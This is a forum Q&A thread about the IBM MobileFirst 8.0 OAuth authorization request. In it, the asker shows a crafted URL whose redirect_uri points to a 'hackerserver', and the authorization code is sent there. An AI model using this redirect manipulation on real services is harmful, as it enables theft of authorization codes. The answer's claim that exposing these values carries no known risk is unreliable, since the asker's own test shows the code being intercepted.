IBM Mobile First 8.0 oAuth flow "client_id" and "redirect_uri" exposed in GET Request

Question

We are using IBM Mobile First 8.0 framework with our IOS application. The framework uses oAuth2.0 flow for authentication flow.

I see client_id and redirect_uri are being passed to authorization endpoint in GET request. It seems this flow is actually taken care by Mobile First framework and I don't have any control over it.

    response_type=code
    scope=
    client_id=CLIENT_ID
    redirect_uri=REDIRECT_URL

What are the security vulnerabilities of exposing "client_id" and "redirect_uri" in GET Request?

EDIT:
I changed the redirect_uri in code and issues request to Authorization end point.

http://mobilefirstserver:port/mfp/api/az/v1/authorization?response_type=code&client_id=CLIENT_ID&scope=SCOPE&redirect_uri=http://hackerserver:port/context/getdata

I thought their was some whitelisting done in framework level but it is not the case.

This is what I see , the authorization_code is passed to hackerserver. http://hackerserver:port/context/getdata?code=authorization_code

Answer 1

There are no known risks of those values being exposed. Those values are used with other encrypted data in the client SDK to identify a client. They are not enough by themselves.

Also, as iddo mentioned in the comments, you are supposed to use SSL/TLS. Someone being able to listen in your traffic is a problem in itself, regardless of client IDs and whatnot.